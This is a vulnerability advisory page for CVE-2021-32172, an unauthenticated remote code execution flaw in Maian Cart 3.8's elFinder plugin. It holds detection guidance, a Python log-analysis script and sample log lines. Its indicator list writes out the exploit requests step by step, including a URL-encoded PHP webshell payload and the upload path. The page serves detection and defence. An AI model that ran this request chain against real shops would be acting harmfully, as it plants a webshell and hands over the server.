CVE-2021-32172
published 2021-10-07

CVE-2021-32172: Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.

Priority: P1 (89), critical, CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW EXPLOIT, VulnCheck KEV: exploited in the wild
EPSS: 66.43% (99.2th percentile)

Affected

1 range

Vendor             Product      Version range   Fixed in
maianscriptworld   maian_cart   -               -

Detection & IOCs (extracted from sources)

url: /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw
url: /admin/index.php?p=ajax-ops&op=elfinder
url: /product-downloads/shell.php
path: /product-downloads/shell.php
filename: shell.php
command: cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E
command: GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
command: cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
  • Detect unauthenticated GET requests to the elFinder endpoint with cmd=mkfile creating a .php file in the target=l1_Lw (root) directory — this is the first stage of the RCE exploit chain.
  • Detect unauthenticated POST requests to /admin/index.php?p=ajax-ops&op=elfinder with cmd=put in the body, which writes a PHP webshell payload (URL-encoded <?php system($_GET["cmd"]) ?>) to the newly created file.
  • Detect GET requests to /product-downloads/*.php — the exploit drops a webshell into this publicly accessible directory and executes it via HTTP GET with a ?cmd= parameter.
  • Alert on the presence of any .php file created under the product-downloads/ directory, as this path is not intended to serve executable PHP scripts.
  • The exploit sends the X-Requested-With: XMLHttpRequest header in the POST write stage; correlate unauthenticated requests bearing this header to the elfinder op endpoint as a detection signal.
  • The exploit cleanup step issues a GET to /admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets[]=<hash> — monitor for unauthenticated rm commands on the elfinder endpoint as evidence of post-exploitation cleanup.
  • The full exploit chain requires exactly 3 unauthenticated HTTP requests (mkfile GET → put POST → shell GET); a sequence of these three request patterns from the same source IP is a high-confidence indicator of exploitation.
  • The elFinder endpoint is accessible without authentication (broken access control, CWE-862), meaning no session cookie or credential is required to trigger the exploit — authentication-based controls alone will not block this attack path.
  • The webshell is written to /product-downloads/, which is a publicly web-accessible directory; WAF rules should block PHP execution in this path in addition to blocking the write operation.
  • The EPSS score is 0.65463 (98.494th percentile), indicating this vulnerability is actively exploited in the wild and should be treated as high-priority for detection and patching.
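The three-request chain described in the bullets above (mkfile GET, put POST, shell GET from one source IP) can be checked directly against a web server access log. The script below is an added example written for this page, not code from cvebase or from the Maian Cart project; it assumes Apache combined log format, and the sample lines (IPs, timestamps, the `l1_EXAMPLEHASH` target) are constructed. Because a plain access log does not record POST bodies, the `cmd=put` stage is approximated as any POST to the elfinder endpoint; a WAF or full-request log that captures bodies could tighten that check.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format). The first host walks the
# full chain from the advisory; the second host only browses a PDF and issues a benign
# elFinder "open" and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Oct/2021:10:01:02 +0000] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=abc.php&target=l1_Lw HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.7 - - [07/Oct/2021:10:01:03 +0000] "POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1" 200 120 "-" "curl/7.68.0"
203.0.113.7 - - [07/Oct/2021:10:01:04 +0000] "GET /product-downloads/abc.php?cmd=id HTTP/1.1" 200 64 "-" "curl/7.68.0"
203.0.113.7 - - [07/Oct/2021:10:01:05 +0000] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets[]=l1_EXAMPLEHASH HTTP/1.1" 200 40 "-" "curl/7.68.0"
198.51.100.9 - - [07/Oct/2021:10:05:00 +0000] "GET /product-downloads/catalog.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Oct/2021:10:05:10 +0000] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=open&target=l1_Lw HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ELFINDER_PATH = "/admin/index.php"   # endpoint from the advisory
SHELL_DIR = "/product-downloads/"    # publicly served directory the webshell lands in
CHAIN = ("mkfile", "put", "shell")   # the three stages, in the order they must occur


def parse_line(line):
    """Split one combined-format log line into ip, method, path, query dict and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    qs = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "path": url.path, "qs": qs, "status": int(m.group("status"))}


def is_elfinder(req):
    return (req["path"] == ELFINDER_PATH
            and req["qs"].get("p") == "ajax-ops"
            and req["qs"].get("op") == "elfinder")


def classify(req):
    """Map one request to an exploit-chain stage ('mkfile', 'put', 'shell', 'cleanup') or None."""
    if req is None:
        return None
    if is_elfinder(req):
        cmd = req["qs"].get("cmd")
        if req["method"] == "GET" and cmd == "mkfile" and req["qs"].get("name", "").lower().endswith(".php"):
            return "mkfile"
        if req["method"] == "POST" and cmd is None:
            # cmd=put travels in the POST body, which the access log does not record, so any
            # POST to the endpoint is treated as the candidate write stage.
            return "put"
        if cmd == "rm":
            return "cleanup"
    if req["method"] == "GET" and req["path"].startswith(SHELL_DIR) and req["path"].lower().endswith(".php"):
        return "shell"
    return None


def _contains_in_order(stages, chain):
    """True if every step of chain appears in stages in that order (gaps allowed)."""
    it = iter(stages)
    return all(step in it for step in chain)


def detect_exploit_chain(log_text):
    """Return (stages observed per source IP, sorted IPs that completed the full chain)."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        req = parse_line(line)
        stage = classify(req)
        if stage:
            per_ip[req["ip"]].append(stage)
    confirmed = sorted(ip for ip, st in per_ip.items() if _contains_in_order(st, CHAIN))
    return dict(per_ip), confirmed


if __name__ == "__main__":
    stages, hits = detect_exploit_chain(SAMPLE_LOG)
    for ip, seq in stages.items():
        print(f"{ip}: {' -> '.join(seq)}")
    print("high-confidence exploitation from:", hits)
```

Any single stage on its own is worth an alert (a .php mkfile against the root target, or any GET for a .php file under /product-downloads/), but the ordered chain from one IP is the high-confidence signal the advisory calls out; the `cleanup` stage is recorded separately so a `cmd=rm` after the shell request can be surfaced as post-exploitation evidence.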

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD (v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck: 9.8 CRITICAL